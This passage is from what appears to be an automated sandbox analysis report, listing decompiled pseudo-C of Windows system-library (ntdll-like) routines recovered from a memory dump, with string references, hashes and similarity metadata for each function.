                                                                                          							E01BB3787(_a4,  &_v352, _t80);
                                                                                          						}
                                                                                          					}
                                                                                          					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                          				}
                                                                                          				_push(_v1156);
                                                                                          				E01B795D0();
                                                                                          				if(_t81 >= 0) {
                                                                                          					goto L12;
                                                                                          				} else {
                                                                                          					goto L11;
                                                                                          				}
                                                                                          			}































                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          • API String ID: 0-2202222882
                                                                                          • Opcode ID: 7c0525071c4546cc678110933fa272a66583eede1c108b3527f172a7e295d137
                                                                                          • Instruction ID: d42be55e7d78c15c75f5f6bd52c2d47a501079d87a3297d3126d859e1ee119ec
                                                                                          • Opcode Fuzzy Hash: 7c0525071c4546cc678110933fa272a66583eede1c108b3527f172a7e295d137
                                                                                          • Instruction Fuzzy Hash: 5F4154B2D0052DABDF25DA90DC80FEEB77CAB54714F0045E5EA19AB250DB709E88CF94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 71%
                                                                                          			E01C005AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                          				signed int _v20;
                                                                                          				char _v24;
                                                                                          				signed int _v28;
                                                                                          				char _v32;
                                                                                          				signed int _v36;
                                                                                          				intOrPtr _v40;
                                                                                          				void* __ebx;
                                                                                          				void* _t35;
                                                                                          				signed int _t42;
                                                                                          				char* _t48;
                                                                                          				signed int _t59;
                                                                                          				signed char _t61;
                                                                                          				signed int* _t79;
                                                                                          				void* _t88;
                                                                                          
                                                                                          				_v28 = __edx;
                                                                                          				_t79 = __ecx;
                                                                                          				if(E01C007DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                          					L13:
                                                                                          					_t35 = 0;
                                                                                          					L14:
                                                                                          					return _t35;
                                                                                          				}
                                                                                          				_t61 = __ecx[1];
                                                                                          				_t59 = __ecx[0xf];
                                                                                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                          				_v36 = _a8 << 0xc;
                                                                                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                          				asm("sbb esi, esi");
                                                                                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                          				if(_t42 != 0) {
                                                                                          					_push(0);
                                                                                          					_push(0x14);
                                                                                          					_push( &_v24);
                                                                                          					_push(3);
                                                                                          					_push(_t59);
                                                                                          					_push(0xffffffff);
                                                                                          					if(E01B79730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                          						_push(_t61);
                                                                                          						E01BFA80D(_t59, 1, _v20, 0);
                                                                                          						_t88 = 4;
                                                                                          					}
                                                                                          				}
                                                                                          				_t35 = E01BFA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                          				if(_t35 < 0) {
                                                                                          					goto L14;
                                                                                          				}
                                                                                          				E01C01293(_t79, _v40, E01C007DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                          				if(E01B57D50() == 0) {
                                                                                          					_t48 = 0x7ffe0380;
                                                                                          				} else {
                                                                                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          				}
                                                                                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                          					E01BF138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                          				}
                                                                                          				goto L13;
                                                                                          			}


















                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `
                                                                                          • API String ID: 0-2679148245
                                                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                          • Instruction ID: d5d9ce28f14ecc0733d11b458027f1c24e46d2780df520f92d0069bceaf38fcd
                                                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                          • Instruction Fuzzy Hash: BC31F532700346ABEB11DE28CC45F9B7BDAEB84794F154129FE599B2C0D770E914CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 72%
                                                                                          			E01BB3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                          				char _v8;
                                                                                          				intOrPtr _v12;
                                                                                          				intOrPtr* _v16;
                                                                                          				char* _v20;
                                                                                          				short _v22;
                                                                                          				char _v24;
                                                                                          				intOrPtr _t38;
                                                                                          				short _t40;
                                                                                          				short _t41;
                                                                                          				void* _t44;
                                                                                          				intOrPtr _t47;
                                                                                          				void* _t48;
                                                                                          
                                                                                          				_v16 = __edx;
                                                                                          				_t40 = 0x14;
                                                                                          				_v24 = _t40;
                                                                                          				_t41 = 0x16;
                                                                                          				_v22 = _t41;
                                                                                          				_t38 = 0;
                                                                                          				_v12 = __ecx;
                                                                                          				_push( &_v8);
                                                                                          				_push(0);
                                                                                          				_push(0);
                                                                                          				_push(2);
                                                                                          				_t43 =  &_v24;
                                                                                          				_v20 = L"BinaryName";
                                                                                          				_push( &_v24);
                                                                                          				_push(__ecx);
                                                                                          				_t47 = 0;
                                                                                          				_t48 = E01B79650();
                                                                                          				if(_t48 >= 0) {
                                                                                          					_t48 = 0xc000090b;
                                                                                          				}
                                                                                          				if(_t48 != 0xc0000023) {
                                                                                          					_t44 = 0;
                                                                                          					L13:
                                                                                          					if(_t48 < 0) {
                                                                                          						L16:
                                                                                          						if(_t47 != 0) {
                                                                                          							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                          						}
                                                                                          						L18:
                                                                                          						return _t48;
                                                                                          					}
                                                                                          					 *_v16 = _t38;
                                                                                          					 *_a4 = _t47;
                                                                                          					goto L18;
                                                                                          				}
                                                                                          				_t47 = L01B54620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                          				if(_t47 != 0) {
                                                                                          					_push( &_v8);
                                                                                          					_push(_v8);
                                                                                          					_push(_t47);
                                                                                          					_push(2);
                                                                                          					_push( &_v24);
                                                                                          					_push(_v12);
                                                                                          					_t48 = E01B79650();
                                                                                          					if(_t48 < 0) {
                                                                                          						_t44 = 0;
                                                                                          						goto L16;
                                                                                          					}
                                                                                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                          						_t48 = 0xc000090b;
                                                                                          					}
                                                                                          					_t44 = 0;
                                                                                          					if(_t48 < 0) {
                                                                                          						goto L16;
                                                                                          					} else {
                                                                                          						_t17 = _t47 + 0xc; // 0xc
                                                                                          						_t38 = _t17;
                                                                                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                          							_t48 = 0xc000090b;
                                                                                          						}
                                                                                          						goto L13;
                                                                                          					}
                                                                                          				}
                                                                                          				_t48 = _t48 + 0xfffffff4;
                                                                                          				goto L18;
                                                                                          			}
















                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          • API String ID: 0-215506332
                                                                                          • Opcode ID: fb3ff3310109b133019b3ef8ddcbe7df9b70a163e7855d7e0cf995c2dd222401
                                                                                          • Instruction ID: eefd73fe2acbeeb9a9d68210b9ce77a7c24a45b073fc37fe4ac91bba74de5b99
                                                                                          • Opcode Fuzzy Hash: fb3ff3310109b133019b3ef8ddcbe7df9b70a163e7855d7e0cf995c2dd222401
                                                                                          • Instruction Fuzzy Hash: 7231E83290051ABFEF19DB58C985EBBBBB4FB40720F0141A9E956A7660D770DE40C7A0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 33%
                                                                                          			E01B6D294(void* __ecx, char __edx, void* __eflags) {
                                                                                          				signed int _v8;
                                                                                          				char _v52;
                                                                                          				signed int _v56;
                                                                                          				signed int _v60;
                                                                                          				intOrPtr _v64;
                                                                                          				char* _v68;
                                                                                          				intOrPtr _v72;
                                                                                          				char _v76;
                                                                                          				signed int _v84;
                                                                                          				intOrPtr _v88;
                                                                                          				char _v92;
                                                                                          				intOrPtr _v96;
                                                                                          				intOrPtr _v100;
                                                                                          				char _v104;
                                                                                          				char _v105;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				signed int _t35;
                                                                                          				char _t38;
                                                                                          				signed int _t40;
                                                                                          				signed int _t44;
                                                                                          				signed int _t52;
                                                                                          				void* _t53;
                                                                                          				void* _t55;
                                                                                          				void* _t61;
                                                                                          				intOrPtr _t62;
                                                                                          				void* _t64;
                                                                                          				signed int _t65;
                                                                                          				signed int _t66;
                                                                                          
                                                                                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                          				_v8 =  *0x1c2d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                          				_v105 = __edx;
                                                                                          				_push( &_v92);
                                                                                          				_t52 = 0;
                                                                                          				_push(0);
                                                                                          				_push(0);
                                                                                          				_push( &_v104);
                                                                                          				_push(0);
                                                                                          				_t59 = __ecx;
                                                                                          				_t55 = 2;
                                                                                          				if(E01B54120(_t55, __ecx) < 0) {
                                                                                          					_t35 = 0;
                                                                                          					L8:
                                                                                          					_pop(_t61);
                                                                                          					_pop(_t64);
                                                                                          					_pop(_t53);
                                                                                          					return E01B7B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                          				}
                                                                                          				_v96 = _v100;
                                                                                          				_t38 = _v92;
                                                                                          				if(_t38 != 0) {
                                                                                          					_v104 = _t38;
                                                                                          					_v100 = _v88;
                                                                                          					_t40 = _v84;
                                                                                          				} else {
                                                                                          					_t40 = 0;
                                                                                          				}
                                                                                          				_v72 = _t40;
                                                                                          				_v68 =  &_v104;
                                                                                          				_push( &_v52);
                                                                                          				_v76 = 0x18;
                                                                                          				_push( &_v76);
                                                                                          				_v64 = 0x40;
                                                                                          				_v60 = _t52;
                                                                                          				_v56 = _t52;
                                                                                          				_t44 = E01B798D0();
                                                                                          				_t62 = _v88;
                                                                                          				_t65 = _t44;
                                                                                          				if(_t62 != 0) {
                                                                                          					asm("lock xadd [edi], eax");
                                                                                          					if((_t44 | 0xffffffff) != 0) {
                                                                                          						goto L4;
                                                                                          					}
                                                                                          					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                          					E01B795D0();
                                                                                          					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                          					goto L4;
                                                                                          				} else {
                                                                                          					L4:
                                                                                          					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                          					if(_t65 >= 0) {
                                                                                          						_t52 = 1;
                                                                                          					} else {
                                                                                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                          						}
                                                                                          					}
                                                                                          					_t35 = _t52;
                                                                                          					goto L8;
                                                                                          				}
                                                                                          			}


































                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: a859e34314630b83e33e89769a569286ed0215c59b63bc21d3e526edf66ecdee
                                                                                          • Instruction ID: 6085b9d7a03eb13f91364bf1b643024cb06962de252f6953f7963ae54bf3af81
                                                                                          • Opcode Fuzzy Hash: a859e34314630b83e33e89769a569286ed0215c59b63bc21d3e526edf66ecdee
                                                                                          • Instruction Fuzzy Hash: D331A1B26083059FC725DF68C980A6BBBECEBA5654F000A6EF9D583210D738DD04CB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 72%
                                                                                          			E01B41B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                          				intOrPtr _v8;
                                                                                          				char _v16;
                                                                                          				intOrPtr* _t26;
                                                                                          				intOrPtr _t29;
                                                                                          				void* _t30;
                                                                                          				signed int _t31;
                                                                                          
                                                                                          				_t27 = __ecx;
                                                                                          				_t29 = __edx;
                                                                                          				_t31 = 0;
                                                                                          				_v8 = __edx;
                                                                                          				if(__edx == 0) {
                                                                                          					L18:
                                                                                          					_t30 = 0xc000000d;
                                                                                          					goto L12;
                                                                                          				} else {
                                                                                          					_t26 = _a4;
                                                                                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                          						goto L18;
                                                                                          					} else {
                                                                                          						E01B7BB40(__ecx,  &_v16, __ecx);
                                                                                          						_push(_t26);
                                                                                          						_push(0);
                                                                                          						_push(0);
                                                                                          						_push(_t29);
                                                                                          						_push( &_v16);
                                                                                          						_t30 = E01B7A9B0();
                                                                                          						if(_t30 >= 0) {
                                                                                          							_t19 =  *_t26;
                                                                                          							if( *_t26 != 0) {
                                                                                          								goto L7;
                                                                                          							} else {
                                                                                          								 *_a8 =  *_a8 & 0;
                                                                                          							}
                                                                                          						} else {
                                                                                          							if(_t30 != 0xc0000023) {
                                                                                          								L9:
                                                                                          								_push(_t26);
                                                                                          								_push( *_t26);
                                                                                          								_push(_t31);
                                                                                          								_push(_v8);
                                                                                          								_push( &_v16);
                                                                                          								_t30 = E01B7A9B0();
                                                                                          								if(_t30 < 0) {
                                                                                          									L12:
                                                                                          									if(_t31 != 0) {
                                                                                          										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                          									}
                                                                                          								} else {
                                                                                          									 *_a8 = _t31;
                                                                                          								}
                                                                                          							} else {
                                                                                          								_t19 =  *_t26;
                                                                                          								if( *_t26 == 0) {
                                                                                          									_t31 = 0;
                                                                                          								} else {
                                                                                          									L7:
                                                                                          									_t31 = L01B54620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                          								}
                                                                                          								if(_t31 == 0) {
                                                                                          									_t30 = 0xc0000017;
                                                                                          								} else {
                                                                                          									goto L9;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				return _t30;
                                                                                          			}










                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          • API String ID: 0-3583428290
                                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                          • Instruction ID: 06cc3033bcd6ebe31017e67a835a60c308e44ddb434ea52331af1c96e5bf2c24
                                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                          • Instruction Fuzzy Hash: 7721D636D04119ABDF2A9A5DCC40F5B7BADEB44650F0585E5FE048F201DB30E851ABA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E01B5F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                          				intOrPtr _t13;
                                                                                          				intOrPtr _t14;
                                                                                          				signed int _t16;
                                                                                          				signed char _t17;
                                                                                          				intOrPtr _t19;
                                                                                          				intOrPtr _t21;
                                                                                          				intOrPtr _t23;
                                                                                          				intOrPtr* _t25;
                                                                                          
                                                                                          				_t25 = _a8;
                                                                                          				_t17 = __ecx;
                                                                                          				if(_t25 == 0) {
                                                                                          					_t19 = 0xc00000f2;
                                                                                          					L8:
                                                                                          					return _t19;
                                                                                          				}
                                                                                          				if((__ecx & 0xfffffffe) != 0) {
                                                                                          					_t19 = 0xc00000ef;
                                                                                          					goto L8;
                                                                                          				}
                                                                                          				_t19 = 0;
                                                                                          				 *_t25 = 0;
                                                                                          				_t21 = 0;
                                                                                          				_t23 = "Actx ";
                                                                                          				if(__edx != 0) {
                                                                                          					if(__edx == 0xfffffffc) {
                                                                                          						L21:
                                                                                          						_t21 = 0x200;
                                                                                          						L5:
                                                                                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                          						 *_t25 = _t13;
                                                                                          						L6:
                                                                                          						if(_t13 == 0) {
                                                                                          							if((_t17 & 0x00000001) != 0) {
                                                                                          								 *_t25 = _t23;
                                                                                          							}
                                                                                          						}
                                                                                          						L7:
                                                                                          						goto L8;
                                                                                          					}
                                                                                          					if(__edx == 0xfffffffd) {
                                                                                          						 *_t25 = _t23;
                                                                                          						_t13 = _t23;
                                                                                          						goto L6;
                                                                                          					}
                                                                                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                          					 *_t25 = _t13;
                                                                                          					L14:
                                                                                          					if(_t21 == 0) {
                                                                                          						goto L6;
                                                                                          					}
                                                                                          					goto L5;
                                                                                          				}
                                                                                          				_t14 = _a4;
                                                                                          				if(_t14 != 0) {
                                                                                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                          					if(_t16 <= 1) {
                                                                                          						_t21 = 0x1f8;
                                                                                          						_t13 = 0;
                                                                                          						goto L14;
                                                                                          					}
                                                                                          					if(_t16 == 2) {
                                                                                          						goto L21;
                                                                                          					}
                                                                                          					if(_t16 != 4) {
                                                                                          						_t19 = 0xc00000f0;
                                                                                          						goto L7;
                                                                                          					}
                                                                                          					_t13 = 0;
                                                                                          					goto L6;
                                                                                          				} else {
                                                                                          					_t21 = 0x1f8;
                                                                                          					goto L5;
                                                                                          				}
                                                                                          			}












                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Actx
                                                                                          • API String ID: 0-89312691
                                                                                          • Opcode ID: a0d77e2fb5bcd8cb02f3f3a433e45f54aa824ef6bd08656353a137cbdb11512c
                                                                                          • Instruction ID: 0d1228dc818ac7300b39326c1ee34bfc1dcaf88c2bbe434c1eea2d30d629a593
                                                                                          • Opcode Fuzzy Hash: a0d77e2fb5bcd8cb02f3f3a433e45f54aa824ef6bd08656353a137cbdb11512c
                                                                                          • Instruction Fuzzy Hash: 4011B2353486028BEBAD4F1DC490736F696EB86664F2546AEED72CB391EBB0C8418340
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 71%
                                                                                          			E01BE8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                          				intOrPtr _t35;
                                                                                          				void* _t41;
                                                                                          
                                                                                          				_t40 = __esi;
                                                                                          				_t39 = __edi;
                                                                                          				_t38 = __edx;
                                                                                          				_t35 = __ecx;
                                                                                          				_t34 = __ebx;
                                                                                          				_push(0x74);
                                                                                          				_push(0x1c10d50);
                                                                                          				E01B8D0E8(__ebx, __edi, __esi);
                                                                                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                          					E01BC5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                          						asm("int3");
                                                                                          						 *(_t41 - 4) = 0xfffffffe;
                                                                                          					}
                                                                                          				}
                                                                                          				 *(_t41 - 4) = 1;
                                                                                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                          				 *((intOrPtr*)(_t41 - 0x64)) = L01B8DEF0;
                                                                                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                          				_push(_t41 - 0x70);
                                                                                          				L01B8DEF0(1, _t38);
                                                                                          				 *(_t41 - 4) = 0xfffffffe;
                                                                                          				return E01B8D130(_t34, _t39, _t40);
                                                                                          			}






                                                                                          Strings
                                                                                          • Critical error detected %lx, xrefs: 01BE8E21
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Critical error detected %lx
                                                                                          • API String ID: 0-802127002
                                                                                          • Opcode ID: b919a01b866ed6f39824c0b9a5d25367173f958fc84869e5ded3efd7176b8bc4
                                                                                          • Instruction ID: f8c8fc5e06fedd3cffc3b5708ff73185b3a47da488d500021f95c5ce771e727b
                                                                                          • Opcode Fuzzy Hash: b919a01b866ed6f39824c0b9a5d25367173f958fc84869e5ded3efd7176b8bc4
                                                                                          • Instruction Fuzzy Hash: 6D113571D54748DADF29EFA9C909B9CBBB0AB14715F2042AEE529AB2D2C3344602CF14
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01BCFF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          • API String ID: 0-1911121157
                                                                                          • Opcode ID: dbe9f0cef3a60004c5dc85ab9c343abe279c3d8e5ae36943d4f45d5e34181fbf
                                                                                          • Instruction ID: 6a603b78d7012992e4750e983163fa4a56655ffc2f80307429e033bae9872903
                                                                                          • Opcode Fuzzy Hash: dbe9f0cef3a60004c5dc85ab9c343abe279c3d8e5ae36943d4f45d5e34181fbf
                                                                                          • Instruction Fuzzy Hash: D111CE71A51145EFDF2AEB94C848FA87BB2FF18B14F1480D8E108571A1C7389940DB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 88%
                                                                                          			E01C05BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                          				signed int _t296;
                                                                                          				signed char _t298;
                                                                                          				signed int _t301;
                                                                                          				signed int _t306;
                                                                                          				signed int _t310;
                                                                                          				signed char _t311;
                                                                                          				intOrPtr _t312;
                                                                                          				signed int _t313;
                                                                                          				void* _t327;
                                                                                          				signed int _t328;
                                                                                          				intOrPtr _t329;
                                                                                          				intOrPtr _t333;
                                                                                          				signed char _t334;
                                                                                          				signed int _t336;
                                                                                          				void* _t339;
                                                                                          				signed int _t340;
                                                                                          				signed int _t356;
                                                                                          				signed int _t362;
                                                                                          				short _t367;
                                                                                          				short _t368;
                                                                                          				short _t373;
                                                                                          				signed int _t380;
                                                                                          				void* _t382;
                                                                                          				short _t385;
                                                                                          				signed short _t392;
                                                                                          				signed char _t393;
                                                                                          				signed int _t395;
                                                                                          				signed char _t397;
                                                                                          				signed int _t398;
                                                                                          				signed short _t402;
                                                                                          				void* _t406;
                                                                                          				signed int _t412;
                                                                                          				signed char _t414;
                                                                                          				signed short _t416;
                                                                                          				signed int _t421;
                                                                                          				signed char _t427;
                                                                                          				intOrPtr _t434;
                                                                                          				signed char _t435;
                                                                                          				signed int _t436;
                                                                                          				signed int _t442;
                                                                                          				signed int _t446;
                                                                                          				signed int _t447;
                                                                                          				signed int _t451;
                                                                                          				signed int _t453;
                                                                                          				signed int _t454;
                                                                                          				signed int _t455;
                                                                                          				intOrPtr _t456;
                                                                                          				intOrPtr* _t457;
                                                                                          				short _t458;
                                                                                          				signed short _t462;
                                                                                          				signed int _t469;
                                                                                          				intOrPtr* _t474;
                                                                                          				signed int _t475;
                                                                                          				signed int _t479;
                                                                                          				signed int _t480;
                                                                                          				signed int _t481;
                                                                                          				short _t485;
                                                                                          				signed int _t491;
                                                                                          				signed int* _t494;
                                                                                          				signed int _t498;
                                                                                          				signed int _t505;
                                                                                          				intOrPtr _t506;
                                                                                          				signed short _t508;
                                                                                          				signed int _t511;
                                                                                          				void* _t517;
                                                                                          				signed int _t519;
                                                                                          				signed int _t522;
                                                                                          				void* _t523;
                                                                                          				signed int _t524;
                                                                                          				void* _t528;
                                                                                          				signed int _t529;
                                                                                          
                                                                                          				_push(0xd4);
                                                                                          				_push(0x1c11178);
                                                                                          				E01B8D0E8(__ebx, __edi, __esi);
                                                                                          				_t494 = __edx;
                                                                                          				 *(_t528 - 0xcc) = __edx;
                                                                                          				_t511 = __ecx;
                                                                                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                          				 *(_t528 - 0xbc) = __ecx;
                                                                                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                          				_t427 = 0;
                                                                                          				 *(_t528 - 0x74) = 0;
                                                                                          				 *(_t528 - 0x9c) = 0;
                                                                                          				 *(_t528 - 0x84) = 0;
                                                                                          				 *(_t528 - 0xac) = 0;
                                                                                          				 *(_t528 - 0x88) = 0;
                                                                                          				 *(_t528 - 0xa8) = 0;
                                                                                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                          				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                          					if(__eflags != 0) {
                                                                                          						_t421 = E01C04C56(0, __edx, __ecx, __eflags);
                                                                                          						__eflags = _t421;
                                                                                          						if(_t421 != 0) {
                                                                                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                          							E01B7D000(0x410);
                                                                                          							 *(_t528 - 0x18) = _t529;
                                                                                          							 *(_t528 - 0x9c) = _t529;
                                                                                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                          							E01C05542(_t528 - 0x9c, _t528 - 0x84);
                                                                                          						}
                                                                                          					}
                                                                                          					_t435 = _t427;
                                                                                          					 *(_t528 - 0xd0) = _t435;
                                                                                          					_t474 = _t511 + 0x65;
                                                                                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                          					_t511 = 0x18;
                                                                                          					while(1) {
                                                                                          						 *(_t528 - 0xa0) = _t427;
                                                                                          						 *(_t528 - 0xbc) = _t427;
                                                                                          						 *(_t528 - 0x80) = _t427;
                                                                                          						 *(_t528 - 0x78) = 0x50;
                                                                                          						 *(_t528 - 0x79) = _t427;
                                                                                          						 *(_t528 - 0x7a) = _t427;
                                                                                          						 *(_t528 - 0x8c) = _t427;
                                                                                          						 *(_t528 - 0x98) = _t427;
                                                                                          						 *(_t528 - 0x90) = _t427;
                                                                                          						 *(_t528 - 0xb0) = _t427;
                                                                                          						 *(_t528 - 0xb8) = _t427;
                                                                                          						_t296 = 1 << _t435;
                                                                                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                          						__eflags = _t436 & _t296;
                                                                                          						if((_t436 & _t296) != 0) {
                                                                                          							goto L92;
                                                                                          						}
                                                                                          						__eflags =  *((char*)(_t474 - 1));
                                                                                          						if( *((char*)(_t474 - 1)) == 0) {
                                                                                          							goto L92;
                                                                                          						}
                                                                                          						_t301 =  *_t474;
                                                                                          						__eflags = _t494[1] - _t301;
                                                                                          						if(_t494[1] <= _t301) {
                                                                                          							L10:
                                                                                          							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                          								L12:
                                                                                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                          									goto L92;
                                                                                          								}
                                                                                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                          									goto L92;
                                                                                          								}
                                                                                          								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                          								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                          									goto L92;
                                                                                          								}
                                                                                          								L15:
                                                                                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                          								 *(_t528 - 0xc0) = _t306;
